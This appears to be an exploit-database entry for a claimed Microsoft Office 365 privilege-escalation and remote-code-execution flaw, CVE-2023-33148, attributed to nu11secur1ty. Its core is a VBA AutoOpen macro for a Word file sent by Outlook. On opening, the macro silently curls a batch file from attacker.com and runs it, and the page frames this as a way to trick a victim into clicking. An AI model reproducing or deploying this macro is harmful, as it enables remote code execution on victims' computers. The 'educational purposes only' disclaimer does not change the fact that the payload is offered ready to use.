Microsoft office 365 version 18.2305.1222.0 elevation of privilege + rce. Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-07-20 | Type : remote | Platform : multiple
This exploit / vulnerability Microsoft office 365 version 18.2305.1222.0 elevation of privilege + rce. is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.
## Author: nu11secur1ty
## Date: 07.18.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office
## Reference: https://portswigger.net/web-security/access-control
## CVE-2023-33148


## Description:
The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to
Elevation of Privilege.
The attacker can use this vulnerability to attach a very malicious
WORD file in the Outlook app which is a part of Microsoft Office 365
and easily can trick the victim to click on it - opening it and
executing a very dangerous shell command, in the background of the
local PC. This execution is without downloading this malicious file,
and this is a potential problem and a very dangerous case! This can be
the end of the victim's PC, it depends on the scenario.

## Staus: HIGH Vulnerability

[+]Exploit:

- Exploit Server:

```vb
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat
&& .\salaries.bat", vbNormalFocus)
End Sub

```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)

## Time spend:
00:35:00